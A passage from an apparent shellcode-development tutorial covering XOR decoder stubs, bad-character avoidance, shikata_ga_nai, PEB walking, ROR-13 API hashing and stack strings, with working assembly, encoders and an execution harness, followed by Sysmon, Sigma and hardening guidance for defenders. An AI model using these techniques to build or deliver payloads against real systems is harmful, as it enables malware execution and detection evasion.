decoder:
    pop  esi                   ; (3) ESI -> first encoded byte
    xor  ecx, ecx
    mov  cl, payload_len       ; loop counter = payload length
decode_loop:
    xor  byte [esi], 0xAA      ; (4) decode one byte, key = 0xAA
    inc  esi                   ; advance
    loop decode_loop           ; ECX--, repeat while non-zero
    jmp  payload               ; (5) run the now-decoded shellcode

get_payload:
    call decoder               ; (2) pushes addr of `payload`, jumps back

payload:
    db   0xcc, 0xcc, 0xcc      ; <-- splice encoder output here
payload_len equ $ - payload

jmp payload assembles to a relative offset, so it stays position-independent without touching ESI. The loop instruction (0xE2) decrements ECX and branches while non-zero.

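Here’s the gotcha that cost me an afternoon once: CL is eight bits. mov cl, payload_len keeps only the low byte of anything over 255, so a 300-byte payload decodes only its first 44 bytes and then jumps into still-encoded garbage. The crash makes no sense until you check ECX. For longer payloads, keep the xor ecx, ecx and load the 16-bit register with mov cx, payload_len. A plain mov ecx, payload_len also works, but its 32-bit immediate carries \x00 bytes for any realistic length, which puts a bad character straight back into the stub. Either way, check the immediate itself against your bad-char set.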
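The truncation and the null-byte trade-off are both one-line calculations. A small sketch, with illustrative helper names, that shows what lands in CL and whether a 16-bit or 32-bit little-endian immediate would contain \x00:

```python
import struct

def cl_value(payload_len: int) -> int:
    """Value that actually lands in CL when the length is loaded into 8 bits."""
    return payload_len & 0xFF

def imm_has_null(payload_len: int, width: str) -> bool:
    """Does the little-endian immediate contain a NUL? width: 'H' = imm16, 'I' = imm32."""
    return b"\x00" in struct.pack("<" + width, payload_len)

if __name__ == "__main__":
    n = 300
    print(cl_value(n))                 # low byte of 0x012C
    print(imm_has_null(n, "H"))        # mov cx, 300  -> bytes 2c 01
    print(imm_has_null(n, "I"))        # mov ecx, 300 -> bytes 2c 01 00 00
```

Lengths that are exact multiples of 256 still put a \x00 into the 16-bit immediate, so padding the payload by a byte is sometimes the cheapest fix.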

Build and extract:

nasm -f elf32 stub.asm -o stub.o
ld   -m elf_i386 stub.o -o stub
objdump -d stub                              # eyeball the opcodes
objcopy -O binary --only-section=.text stub stub.bin
xxd -i stub.bin                              # emit a C array of the bytes

To confirm the assembled stub plus spliced payload actually executes, test it in a throwaway VM — never on your host, never networked:

/* LAB ONLY — disposable VM, no network.
   gcc -m32 -z execstack -fno-stack-protector test.c -o test */

#include <stdio.h>
unsigned char buf[] =
    "\xeb\x0d\x5e\x31\xc9\xb1\x08\x80\x36\xaa\x46\xe2\xfa\xeb\x05"
    "\xe8\xee\xff\xff\xff" /* + encoded payload bytes */;
int main(void) {
    printf("stub length: %zu\n", sizeof(buf) - 1);
    ((void(*)())buf)();
    return 0;
}

[Figure: flow diagram of the JMP-CALL-POP technique: a forward JMP reaches a CALL that pushes the payload address, POP captures it into ESI, and the decode loop XORs each byte before jumping into the now-decoded shellcode.]
JMP-CALL-POP gives the decoder stub a runtime pointer to the encoded payload without any hardcoded addresses, making it fully position-independent.

6. The Stub Must Be Clean Too

This is the mistake nearly every student makes: they encode the payload until it’s spotless, splice it in, and the exploit still dies — because the decoder stub’s own opcodes contain a bad char. The transport doesn’t care which bytes are “payload” and which are “decoder.” Every byte in the buffer has to survive.

So audit the stub bytes the same way you audit everything else:

#!/usr/bin/env python3
# Flag any decoder-stub byte that collides with the bad-char set.
from capstone import Cs, CS_ARCH_X86, CS_MODE_32

def audit_stub(stub: bytes, bad: set):
    md = Cs(CS_ARCH_X86, CS_MODE_32)
    for ins in md.disasm(stub, 0x0):
        raw = stub[ins.address:ins.address + ins.size]
        hits = [hex(b) for b in raw if b in bad]
        tag = f"   <-- BAD {hits}" if hits else ""
        print(f"{ins.address:04x}  {ins.mnemonic:6} {ins.op_str}{tag}")

When a hit shows up, rewrite the instruction to a semantically equal one with different opcodes. The textbook example: xor eax, eax assembles to \x31\xc0. If \x31 is bad, swap in sub eax, eax (\x29\xc0), which zeroes the register just as well. The same trick rescues xor ecx, ecx (\x31\xc9 → sub ecx, ecx = \x29\xc9). Keep a mental table of these substitutions; you’ll lean on it constantly.


7. Per-Chunk Keyed Encoding

When the bad-char set is large enough that no single key clears the whole payload, split the work. Break the shellcode into N-byte chunks; for each chunk, search for a byte that XORs that chunk clean, then prepend the chosen key byte to the chunk. The decoder reads the key, applies it to the following N bytes, advances, and repeats.

; Per-chunk keyed decoder. Layout: [key][d0][d1] [key][d0][d1] ... [marker]
decode_chunk:
    mov   al, [esi]            ; AL = key for this chunk
    inc   esi                  ; ESI -> first data byte
    xor   byte [esi], al       ; decode data byte 0
    inc   esi
    xor   byte [esi], al       ; decode data byte 1
    inc   esi
    cmp   byte [esi], 0x90     ; end-marker (raw, unencoded NOP)?
    jne   decode_chunk
    jmp   payload_start        ; first decoded byte

Scheme            Pro                              Con
----------------  -------------------------------  -------------------------------------------------
Fixed single key  Smallest stub; one xor per byte  Fails when bad-char set is dense
Per-chunk key     Survives tight bad-char sets     Larger blob (one key byte per chunk); bigger stub

The end-marker matters here: a fixed length is brittle, so a sentinel lets the decoder run until it sees the marker instead of carrying a hardcoded count. Pick a marker value that can’t appear as a chunk key or you’ll halt early. If 0x90 is a plausible key, use a distinctive two-byte sentinel instead.
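The blob layout the decoder expects can be produced and verified with a short Python model. This is a sketch under stated assumptions: two-byte chunks and a 0x90 marker to match the assembly above, a payload already padded to a multiple of the chunk size, and a marker value that is not itself a bad character. The function names are illustrative, and the payload is the same benign exit(0) stub used earlier.

```python
def encode_chunks(sc: bytes, bad: set, n: int = 2, marker: int = 0x90) -> bytes:
    """Emit [key][n encoded bytes]... followed by the raw end-marker."""
    if len(sc) % n:
        raise ValueError("pad the payload to a multiple of n first")
    out = bytearray()
    for i in range(0, len(sc), n):
        chunk = sc[i:i + n]
        # First key that is clean, is not the marker, and encodes the chunk clean.
        key = next((k for k in range(1, 256)
                    if k not in bad and k != marker
                    and all((b ^ k) not in bad for b in chunk)), None)
        if key is None:
            raise ValueError(f"no clean key for chunk at offset {i}")
        out.append(key)
        out += bytes(b ^ key for b in chunk)
    out.append(marker)
    return bytes(out)

def decode_chunks(blob: bytes, n: int = 2, marker: int = 0x90) -> bytes:
    """Python mirror of the decoder loop: read key, XOR n bytes, stop at marker."""
    out, i = bytearray(), 0
    while blob[i] != marker:          # marker is only tested at key positions
        key = blob[i]
        out += bytes(b ^ key for b in blob[i + 1:i + 1 + n])
        i += 1 + n
    return bytes(out)

if __name__ == "__main__":
    exit0 = bytes([0x31, 0xC0, 0xB0, 0x01, 0x31, 0xDB, 0xCD, 0x80])
    blob = encode_chunks(exit0, {0x00, 0x0A, 0x0D})
    print(blob.hex(), decode_chunks(blob) == exit0)
```

Excluding the marker from the key search is what enforces the rule above: the decoder only tests for the marker where a key byte would sit, so encoded data bytes are free to equal 0x90.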


8. Stack-Based Decoding

In-place decoding writes over the encoded blob where it sits. Sometimes you’d rather leave the original untouched and decode into fresh stack space — useful when the landing buffer is read-only or you want the executable copy somewhere predictable.

decoder:
    pop   esi                  ; ESI -> encoded payload
    sub   esp, 0x200           ; reserve 512 bytes of scratch
    mov   edi, esp             ; EDI -> destination buffer
    xor   edx, edx             ; offset = 0
copy_decode:
    mov   al, [esi + edx]      ; fetch encoded byte
    cmp   al, 0xcc             ; raw end-marker?
    je    run
    xor   al, 0xaa             ; decode with key
    mov   [edi + edx], al      ; write to stack
    inc   edx
    jmp   copy_decode
run:
    jmp   edi                  ; execute decoded shellcode on the stack

EDX tracks the running offset into both source and destination; the marker is checked before decoding so it stays a literal sentinel. The catch: sub esp must reserve enough room, and the marker can’t collide with an encoded byte. This pattern is also the one DEP/NX and Arbitrary Code Guard hit hardest — you’re executing freshly written stack memory, which is exactly what those mitigations exist to stop (Section 10).


9. shikata_ga_nai: the State of the Art

The single-byte XOR loop is trivially signatured — that tight xor / inc / loop sequence is a detection rule. Metasploit’s shikata_ga_nai answers with a polymorphic XOR additive feedback encoder. Two ideas carry it:

  • Chained, self-modifying key. Each decoded byte feeds into the key used for the next. Get one byte or the initial key wrong and the whole tail decodes to noise — which also frustrates partial emulation.
  • Metamorphic stub generation. The decoder is rebuilt with reordered and substituted instructions every time, so two payloads from the same source share no static signature. Its GetPC routine is deliberately obfuscated, using FPU instructions such as fnstenv [esp-0xc] to recover EIP without a tell-tale CALL, which also trips emulators that don’t model the FPU.

You don’t need to build one to defend against it. The lesson for blue teams is the opposite: stop chasing the encoded bytes and watch the behavior, because the bytes are designed to be different every time and the behavior isn’t.
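To make the "chained key" idea concrete for analysts, here is a toy Python model of additive feedback. It is a sketch under stated assumptions, not Metasploit's implementation: it assumes 32-bit little-endian blocks and that the key is advanced by adding each decoded dword, and the function names are hypothetical.

```python
import struct

MASK = 0xFFFFFFFF


def feedback_encode(plain: bytes, key: int) -> bytes:
    """XOR each dword with the key, then fold the plaintext dword into the key."""
    if len(plain) % 4:
        raise ValueError("pad the input to a multiple of 4 bytes")
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", plain):
        out += struct.pack("<I", word ^ key)
        key = (key + word) & MASK
    return bytes(out)


def feedback_decode(encoded: bytes, key: int) -> bytes:
    """Inverse of feedback_encode; the key evolves from the decoded output."""
    out = bytearray()
    for (word,) in struct.iter_unpack("<I", encoded):
        plain = word ^ key
        out += struct.pack("<I", plain)
        key = (key + plain) & MASK
    return bytes(out)


data = bytes(range(32))                     # placeholder data
blob = feedback_encode(data, 0x12345678)
assert feedback_decode(blob, 0x12345678) == data

# Flip one bit in the first encoded dword: the error leaks into the next key.
damaged = bytes([blob[0] ^ 1]) + blob[1:]
garbled = feedback_decode(damaged, 0x12345678)
assert garbled[4:8] != data[4:8]
```

The second assertion is the point: a single wrong bit changes the key used for the following dword, which is why an emulator that mis-steps once cannot recover the tail by guessing a fixed key.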


10. Detection and Defense: What the Blue Team Sees

The encoded payload is, by construction, a poor signature target. The decoder’s behavior is not. Two heuristics catch nearly every variant: self-modifying memory (a region writes to itself, then executes), and execution from writable memory (RWX stack/heap pages, VirtualAlloc(PAGE_EXECUTE_READWRITE)).

Behavior                                  What it reveals
Tight xor/inc/loop over a code region     Classic fixed-key decoder stub
Region transitions writable → executable  Decoded payload about to run
Execution from unbacked memory            Code with no file on disk behind it

Sysmon Event IDs

Event ID  Name                Relevance
1         Process Creation    Loader/injector process spawn
7         Image Loaded        DLLs from temp/download paths into system processes
8         CreateRemoteThread  Thread created in another process; low-volume, high-signal
10        ProcessAccess       Cross-process memory access; inspect GrantedAccess and CallTrace
25        ProcessTampering    In-memory image diverges from disk (hollowing / in-memory decode)

Configuration is where visibility quietly dies. The SwiftOnSecurity sysmon-config excludes kernel32.dll as a StartModule, which silently suppresses Event ID 8 for injections that go through LoadLibraryW. Remove that StartModule exclusion to restore coverage.

Sigma Rule

title: Shellcode Injection via Suspicious Cross-Process Access
logsource:
  product: windows
  category: process_access
detection:
  selection:
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
tags:
  - attack.t1055

A CallTrace of UNKNOWN means the access originated from unbacked memory — no module owns those instructions, which is exactly the fingerprint a decoded payload leaves.
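Before deploying a rule like this, it can help to replay its logic against a few exported events. The sketch below re-implements only the selection shown above in plain Python; the event dictionaries are invented samples, and the field names are assumed to match Sysmon Event ID 10 as referenced in the rule.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}   # values taken from the rule above


def matches_rule(event: dict) -> bool:
    """Return True when an event satisfies the rule's selection block."""
    granted = str(event.get("GrantedAccess", "")).lower()
    call_trace = str(event.get("CallTrace", "")).lower()
    # Sigma string matching is case-insensitive, so compare in lowercase.
    return granted in SUSPICIOUS_ACCESS and "unknown" in call_trace


# Invented sample events for illustration only.
backed = {
    "GrantedAccess": "0x1F3FFF",
    "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|C:\\Windows\\System32\\KERNELBASE.dll+2c13e",
}
unbacked = {
    "GrantedAccess": "0x147A",
    "CallTrace": "C:\\Windows\\SYSTEM32\\ntdll.dll+9d4c4|UNKNOWN(000001F2A3B40000)",
}

for name, event in (("backed", backed), ("unbacked", unbacked)):
    print(name, matches_rule(event))
```

Only the second sample matches: the access mask alone is not enough, the call stack must also contain a frame that no module owns.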

ETW providers

Provider                               Purpose
Microsoft-Windows-Threat-Intelligence  Kernel-level VirtualAlloc/VirtualProtect/WriteProcessMemory/CreateRemoteThread; consumed by PPL EDRs
Microsoft-Windows-Security-Auditing    Event ID 4688 process creation with command line
AMSI                                   Inspects script content after deobfuscation, before execution

Hardening

  • bcdedit /set nx AlwaysOn — system-wide DEP/NX blocks execution of decoded stack/heap output.
  • Arbitrary Code Guard (ACG) via ProcessDynamicCodePolicy — forbids self-modifying and dynamically generated code, which directly kills in-place XOR decode.
  • Code Integrity Guard (CIG) via ProcessSignaturePolicy — blocks unsigned image loads.
  • Watch for AmsiScanBuffer patching, the standard AMSI bypass; pair AMSI with constrained language mode and allowlisting.
  • Scan for RWX and unbacked regions with pe-sieve, Moneta, or Hunt-Sleeping-Beacons — the residue a decoded payload leaves behind.

[Figure: hierarchy diagram showing behavioral indicators branching into RWX self-modifying memory and unbacked execution, each feeding into corresponding telemetry sources and hardening controls.]
Defenders shift focus from ever-changing encoded bytes to stable behavioral signals — self-modifying memory and unbacked execution are the constants that encoding cannot hide.

11. Tools

Tool               Description                                    Link
NASM               Assemble x86/x64 decoder stubs                 nasm.us
GDB + pwndbg       Single-step the decode loop, inspect ESI/ECX   gdb.gnu.org
objdump / objcopy  Disassemble stubs, extract .text bytes         gnu.org
Capstone           Programmatic opcode audit for bad chars        capstone-engine.org
pwntools           Encoder/exploit automation (pwnlib.encoders)   docs.pwntools.com
pe-sieve / Moneta  Scan live processes for RWX / unbacked memory  github.com
Sysmon             Endpoint telemetry for Event IDs 8, 10, 25     learn.microsoft.com

12. MITRE ATT&CK Mapping

Technique                                MITRE ID   Detection
Obfuscated Files or Information          T1027      Entropy/structure anomalies; encoded blob with decoder prefix
Encrypted/Encoded File                   T1027.013  Static scan for XOR-loop stub patterns near high-entropy data
Deobfuscate/Decode Files or Information  T1140      Self-modifying memory; ACG violations; ETW VirtualProtect
Process Injection                        T1055      Sysmon 8/10; Sigma on GrantedAccess + CallTrace: UNKNOWN
PE Injection                             T1055.002  Shellcode written into another process; RWX region creation
Reflective Code Loading                  T1620      Execution from unbacked memory; pe-sieve / Moneta

Summary

  • XOR encoding survives bad-char-hostile delivery paths because XOR is self-inverse — encode once, decode at runtime with the same key.
  • The decoder stub uses JMP-CALL-POP to find itself in memory, then loops xor byte [esi], key over the encoded payload and jumps in; a CL loop counter silently caps you at 255 bytes.
  • The stub’s own opcodes must be bad-char-clean too — audit them with Capstone and substitute equivalent instructions (sub eax,eax for xor eax,eax).
  • Per-chunk keys and stack-based decode handle dense bad-char sets and read-only buffers; shikata_ga_nai adds polymorphism so the encoded bytes never signature the same way twice.
  • Defenders ignore the shifting bytes and hunt the behavior — self-modifying RWX memory, CallTrace: UNKNOWN on Sysmon Event ID 10, and ACG/DEP violations on execution.


Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses

Objective: Understand how Windows shellcode achieves position independence — resolving module bases through the TEB/PEB chain, walking PE export tables, hashing API names, and eliminating null bytes — so defenders can detect the resulting memory and behavioral signatures and authorized red teamers can build and test payloads correctly.


1. What Makes Code Position-Dependent?

A normal Windows executable contains absolute virtual addresses everywhere: indirect calls through the Import Address Table (IAT), references to global variables, jump tables, and so on. The PE loader fixes these up at load time using the .reloc section and patches the IAT against the modules it has just mapped.

Shellcode has none of that. It is raw opcodes copied into a memory region (often allocated by VirtualAlloc or written into another process), with no loader, no relocation table, no IAT, and no guarantee about where it will live. Any hardcoded virtual address — to a string, to an API, to a jump target — will be wrong the moment the payload moves.

The constraint is therefore strict: every address the shellcode needs must be computed at runtime, from a known starting point that the OS itself hands the thread. On Windows, that starting point is the Thread Environment Block (TEB).


2. The Problem with the IAT

A standard PE binary calls LoadLibraryA via something like call qword ptr [rip+IAT_LoadLibraryA], an indirect call through a slot the loader populated. Shellcode cannot do this:

  • It has no .idata section, no IMAGE_IMPORT_DESCRIPTOR, and no loader to read them.
  • It cannot embed an absolute kernel32!LoadLibraryA address because ASLR randomizes module bases every boot.
  • It cannot rely on Windows syscall numbers either — those numbers are not a stable ABI and shift between builds.

The standard solution is PEB walking: the shellcode traces the in-memory loader data structures to find kernel32.dll, parses its export table, and resolves the handful of APIs it actually needs (typically LoadLibraryA and GetProcAddress, which then bootstrap anything else).


3. Windows Memory Layout Primer: TEB, PEB, and the Loader

Every Windows thread has a TEB. The OS keeps a pointer to it in a segment register so user-mode code can reach it in a single instruction:

Architecture  Instruction         Result
x86           MOV EAX, FS:[0x30]  EAX ← TEB.ProcessEnvironmentBlock (PEB)
x64           MOV RAX, GS:[0x60]  RAX ← TEB.ProcessEnvironmentBlock (PEB)

From the PEB, shellcode chains through Ldr (a _PEB_LDR_DATA*) to reach the loader’s three doubly-linked lists of _LDR_DATA_TABLE_ENTRY records — one entry per loaded module.

Relevant offsets (Windows 10/11):

Struct                 Field                            x86 offset  x64 offset
_TEB                   ProcessEnvironmentBlock          +0x030      +0x060
_PEB                   Ldr                              +0x00C      +0x018
_PEB_LDR_DATA          InLoadOrderModuleList            +0x00C      +0x010
_PEB_LDR_DATA          InMemoryOrderModuleList          +0x014      +0x020
_PEB_LDR_DATA          InInitializationOrderModuleList  +0x01C      +0x030
_LDR_DATA_TABLE_ENTRY  DllBase                          +0x018      +0x030
_LDR_DATA_TABLE_ENTRY  BaseDllName                      +0x02C      +0x058

Verify offsets on your target build with WinDbg (dt ntdll!_PEB, dt ntdll!_LDR_DATA_TABLE_ENTRY). They are stable across mainstream Windows 10/11 but not guaranteed forever.

// Conceptual layout — fields used by PEB-walking shellcode
typedef struct _LDR_DATA_TABLE_ENTRY {
    LIST_ENTRY     InLoadOrderLinks;        // +0x00
    LIST_ENTRY     InMemoryOrderLinks;      // +0x10 (x64)
    LIST_ENTRY     InInitializationOrderLinks;
    PVOID          DllBase;                 // +0x30 (x64)
    PVOID          EntryPoint;
    ULONG          SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;             // +0x58 (x64)
    // ...
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
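
The offsets in the struct comments follow directly from natural alignment, which makes them easy to re-derive when checking someone else's numbers. The sketch below is a hypothetical helper (not a Windows API) that lays out the leading fields for a 4-byte and an 8-byte pointer size; it assumes LIST_ENTRY and UNICODE_STRING are each two pointers wide, which holds on both architectures.

```python
def natural_layout(fields):
    """Assign offsets so that each field starts at a multiple of its alignment."""
    offsets, cursor = {}, 0
    for name, size, align in fields:
        cursor = (cursor + align - 1) // align * align
        offsets[name] = cursor
        cursor += size
    return offsets


def ldr_entry_fields(ptr):
    """Leading fields of _LDR_DATA_TABLE_ENTRY for a pointer size of 4 or 8."""
    pair = (2 * ptr, ptr)   # (size, alignment) of LIST_ENTRY / UNICODE_STRING
    return [
        ("InLoadOrderLinks", *pair),
        ("InMemoryOrderLinks", *pair),
        ("InInitializationOrderLinks", *pair),
        ("DllBase", ptr, ptr),
        ("EntryPoint", ptr, ptr),
        ("SizeOfImage", 4, 4),
        ("FullDllName", *pair),
        ("BaseDllName", *pair),
    ]


x86 = natural_layout(ldr_entry_fields(4))
x64 = natural_layout(ldr_entry_fields(8))
for name in x64:
    print(f"{name:28} x86 +0x{x86[name]:03X}   x64 +0x{x64[name]:03X}")

# Distance from InMemoryOrderLinks to DllBase, the value list-walking code uses.
print(hex(x64["DllBase"] - x64["InMemoryOrderLinks"]))
```

The last line matters for any code that walks InMemoryOrderModuleList: the list pointers land on InMemoryOrderLinks, not on the start of the entry, so DllBase is read at a smaller displacement than the struct offset.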

[Figure: flowchart showing the shellcode pointer chain from TEB via PEB and PEB_LDR_DATA to the kernel32.dll DllBase field.]
Every PIC shellcode begins here: a single segment-register read unravels the full loader chain to kernel32’s image base.

4. Walking the Module List to Find kernel32.dll

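The loader populates InMemoryOrderModuleList in a predictable order on a typical process: the main executable first, then ntdll.dll, then kernel32.dll. (InInitializationOrderModuleList does not contain the executable at all, and since Windows 7 it places kernelbase.dll ahead of kernel32.dll, so the same shortcut does not transfer to it.) A common shortcut is to grab the third entry’s DllBase without ever comparing a name: fewer bytes, no strings, no signatures.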

; x64 — locate kernel32.dll base via the PEB
; Output: RBX = kernel32.dll base address

    xor   rcx, rcx
    mov   rax, [gs:rcx + 0x60]      ; RAX = PEB
    mov   rax, [rax + 0x18]         ; RAX = PEB->Ldr
    mov   rax, [rax + 0x20]         ; RAX = InMemoryOrderModuleList.Flink (1st: this EXE)
    mov   rax, [rax]                ; 2nd entry: ntdll.dll
    mov   rax, [rax]                ; 3rd entry: kernel32.dll
    mov   rbx, [rax + 0x20]         ; LDR_DATA_TABLE_ENTRY.DllBase
                                    ; (offset 0x20 within an InMemoryOrder-rooted entry)

For 32-bit shellcode the same idea applies with smaller offsets:

; x86 — same walk, FS-relative
    xor   ecx, ecx
    mov   eax, [fs:ecx + 0x30]      ; EAX = PEB
    mov   eax, [eax + 0x0C]         ; PEB->Ldr
    mov   eax, [eax + 0x14]         ; InMemoryOrderModuleList.Flink
    mov   eax, [eax]                ; 2nd
    mov   eax, [eax]                ; 3rd (kernel32)
    mov   ebx, [eax + 0x10]         ; DllBase (x86 offset)

A more robust variant iterates the list and hash-compares BaseDllName.Buffer (Unicode), upper-casing each character inline. That survives reordering and is what production loaders use.


5. Parsing the PE Export Directory

Once RBX = kernel32!ImageBase, the shellcode parses the PE headers:

ImageBase
  └─► IMAGE_DOS_HEADER.e_lfanew (+0x3C)
        └─► IMAGE_NT_HEADERS
              └─► OptionalHeader.DataDirectory[0]  ; EXPORT
                    └─► IMAGE_EXPORT_DIRECTORY
                          ├─ NumberOfNames
                          ├─ AddressOfNames        (RVA → name RVAs)
                          ├─ AddressOfNameOrdinals (RVA → ordinal table)
                          └─ AddressOfFunctions    (RVA → function RVAs)

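AddressOfNames and AddressOfNameOrdinals are parallel: index i in AddressOfNames matches index i in AddressOfNameOrdinals, whose value o then indexes AddressOfFunctions[o]. AddressOfFunctions is indexed by ordinal, not by name position. Name and function entries are RVAs, so the resolved function address is ImageBase + RVA; the ordinal table holds 16-bit indices rather than RVAs.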

; x64 — reach the export directory from RBX = ImageBase
; Output: RCX = IMAGE_EXPORT_DIRECTORY*
    mov   eax, dword [rbx + 0x3C]   ; DOS.e_lfanew
    lea   rdx, [rbx + rax]          ; RDX -> IMAGE_NT_HEADERS
    mov   eax, dword [rdx + 0x88]   ; NT.OptionalHeader.DataDirectory[0].VirtualAddress
    lea   rcx, [rbx + rax]          ; RCX -> IMAGE_EXPORT_DIRECTORY

    mov   r8d,  dword [rcx + 0x18]  ; NumberOfNames
    mov   r9d,  dword [rcx + 0x20]  ; AddressOfNames     (RVA)
    mov   r10d, dword [rcx + 0x24]  ; AddressOfNameOrdinals
    mov   r11d, dword [rcx + 0x1C]  ; AddressOfFunctions

The resolver then iterates 0..NumberOfNames-1, hashes the name string at ImageBase + Names[i], compares against a precomputed target, and on match returns ImageBase + Functions[ Ordinals[i] ].
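
The two-step indirection is the part that most often gets mis-implemented, so here is a small Python model of it. This is a sketch over an invented export table: the names, RVAs, and image base are placeholders, and a plain string comparison stands in for the hash comparison a real resolver would use.

```python
def resolve_export(image_base, names, name_ordinals, functions, wanted):
    """Resolve `wanted` via Names[i] -> Ordinals[i] -> Functions[ordinal]."""
    for i, name in enumerate(names):
        if name == wanted:                      # real stubs compare hashes here
            ordinal_index = name_ordinals[i]    # same index i, parallel array
            return image_base + functions[ordinal_index]
    return None


# Invented toy table. Names are sorted; the function table is in ordinal order,
# so the two do not line up position by position.
IMAGE_BASE = 0x7FF800000000
NAMES = ["Alpha", "Beta", "Gamma"]
NAME_ORDINALS = [2, 0, 1]
FUNCTIONS = [0x1000, 0x2000, 0x3000]

address = resolve_export(IMAGE_BASE, NAMES, NAME_ORDINALS, FUNCTIONS, "Alpha")
print(hex(address))
```

Indexing FUNCTIONS with the name position instead of the ordinal would return 0x1000 for "Alpha" here, which is the classic off-by-table bug this layout invites.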


[Figure: flowchart illustrating the three export table arrays (AddressOfNames, AddressOfNameOrdinals, AddressOfFunctions) and how they combine to resolve a Windows API address at runtime.]
The export directory’s three parallel arrays form a two-step indirection: name index maps to ordinal, ordinal maps to function RVA.

6. Function Name Hashing (ROR-13)

Embedding the literal string "LoadLibraryA" would (a) introduce hardcoded data references and (b) be a trivial AV signature. The standard substitute is an inline rolling hash. The most common is ROR-13 add:

// Conceptual ROR-13 hash. Iterate bytes of the export name; stop at NUL.
// Same routine is implemented inline in assembly when resolving APIs.
unsigned int ror13_hash(const char *name) {
    unsigned int h = 0;
    while (*name) {
        h = (h >> 13) | (h << (32 - 13));   // ROR 13
        h += (unsigned char)*name++;
    }
    return h;
}

// Pre-computed constants (illustrative — recompute for your toolchain):
// LoadLibraryA   -> 0xEC0E4E8E   (0x0726774C is Metasploit's block_api value, which also hashes the module name)
// GetProcAddress -> 0x7C0DFCAA
// ExitProcess    -> 0x73E2D87E
// VirtualAlloc   -> 0x91AFCA54

Replacing the while body with three cmp/ror/add instructions inside the export-walk loop produces a few dozen bytes of fully position-independent resolver — no strings, no absolute addresses, no relocations.
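
For YARA authors and analysts it is handy to regenerate these constants rather than trust a copied table. The sketch below ports the C routine above to Python; it assumes the name-only variant shown there (rotate, then add, no terminating NUL, no module-name component), and the function names are hypothetical.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def ror13_hash(name: str) -> int:
    """Name-only ROR-13 additive hash, matching the C routine above."""
    h = 0
    for byte in name.encode("ascii"):
        h = ror32(h, 13)
        h = (h + byte) & 0xFFFFFFFF
    return h


for api in ("LoadLibraryA", "GetProcAddress", "ExitProcess", "VirtualAlloc"):
    print(f"{api:16} 0x{ror13_hash(api):08X}")
```

Under this variant LoadLibraryA hashes to 0xEC0E4E8E. Toolchains that also mix in the module name or a different rotation count produce different constants, so a hunting rule should list the values for each variant it wants to cover.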


7. RIP-Relative Addressing and the CALL/POP Trick

When the shellcode does need inline data (a precomputed key, a config blob, a wide-string template), it must reference it without an absolute address.

x64 makes this nearly free: every LEA reg, [rel label] and direct CALL/JMP is encoded RIP-relative:

    lea   rcx, [rel api_hash_table]   ; RIP-relative, no relocation needed

x86 has no RIP-relative encoding. The classic substitute is the get-EIP trick: CALL past a label, then POP the return address into a register, giving you a known anchor:

    call  get_eip
get_eip:
    pop   ebp                          ; EBP = address of this instruction
    ; data referenced as [ebp + (label - get_eip)]

Anything stored inline can now be addressed by displacement from EBP.
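
One detail worth checking when reading such stubs is the CALL's displacement bytes. The sketch below computes the encoding of a near CALL (opcode E8 followed by a signed 32-bit displacement measured from the end of the instruction); the helper name and the addresses are illustrative assumptions.

```python
import struct


def encode_call_rel32(call_addr: int, target: int) -> bytes:
    """Encode `call target` placed at call_addr as E8 + rel32."""
    displacement = target - (call_addr + 5)   # relative to the next instruction
    return b"\xE8" + struct.pack("<i", displacement)


here = 0x1000                                  # arbitrary illustrative address

# CALL to the very next instruction, as in the get_eip listing above.
forward = encode_call_rel32(here, here + 5)
# CALL backwards by a few bytes, as in a JMP-CALL-POP arrangement.
backward = encode_call_rel32(here, here - 0x10)

print(forward.hex(" "), "contains NUL:", b"\x00" in forward)
print(backward.hex(" "), "contains NUL:", b"\x00" in backward)
```

The forward form has a zero displacement and therefore four NUL bytes, while a short backward call sign-extends to 0xFF bytes. That difference is why null-sensitive stubs tend to prefer the JMP-CALL-POP layout, and it is a useful byte pattern to recognize in a hex dump.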


8. Stack Strings and Null-Byte Elimination

Shellcode is often delivered via a string-copying primitive (strcpy, lstrcpyA, a parser that stops at \0), so embedded null bytes truncate the payload. Two problems must be solved together: avoid nulls in opcodes, and produce required strings ("kernel32.dll", "WinExec", "cmd.exe") without storing them as data.

Construct strings on the stack by pushing immediates:

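; Build "cmd.exe\0" on the stack (8 bytes including NUL)
; A plain mov rax, 0x6578652E646D63 would carry a 0x00 in the top byte of its imm64.
    mov   rax, 0xFF6578652E646D63   ; 'cmd.exe' little-endian, 0xFF filler where the NUL belongs
    shl   rax, 8                    ; shift the filler byte out of the top ...
    shr   rax, 8                    ; ... and zeros back in: RAX = 'cmd.exe\0'
    push  rax                       ; terminator is the top byte of the qword
    mov   rcx, rsp                  ; RCX -> "cmd.exe\0", first arg for WinExec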

Eliminate accidental nulls in opcodes:

Avoid                                   Use instead                   Reason
mov rax, 0 (48 C7 C0 00 00 00 00)       xor rax, rax                  Removes four NUL bytes
push 0 (6A 00)                          xor reg, reg; push reg        6A 00 contains a NUL
Short jumps spanning NUL displacements  Pad with nop or reorder code  Avoids NUL in the offset byte
mov al, 0x00                            xor al, al                    Same fix at byte width

Always disassemble and grep the assembled output for \x00 before shipping — see Section 10.
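
String immediates are a frequent source of accidental nulls, because the terminator and any padding end up inside the pushed value. The sketch below packs an ASCII string into little-endian qwords and reports which ones would put a NUL into an instruction's immediate; the helper names are hypothetical.

```python
def qword_immediates(text: str) -> list:
    """Pack text plus a NUL terminator into little-endian qwords, in push order."""
    raw = text.encode("ascii") + b"\x00"
    raw += b"\x00" * (-len(raw) % 8)            # pad to a multiple of 8 bytes
    chunks = [raw[i:i + 8] for i in range(0, len(raw), 8)]
    # The last chunk is pushed first so the string reads forward in memory.
    return [int.from_bytes(chunk, "little") for chunk in reversed(chunks)]


def immediate_has_nul(value: int) -> bool:
    """True when the 8-byte encoding of the immediate contains a zero byte."""
    return 0 in value.to_bytes(8, "little")


for imm in qword_immediates("cmd.exe"):
    print(f"0x{imm:016X}  NUL in immediate: {immediate_has_nul(imm)}")
```

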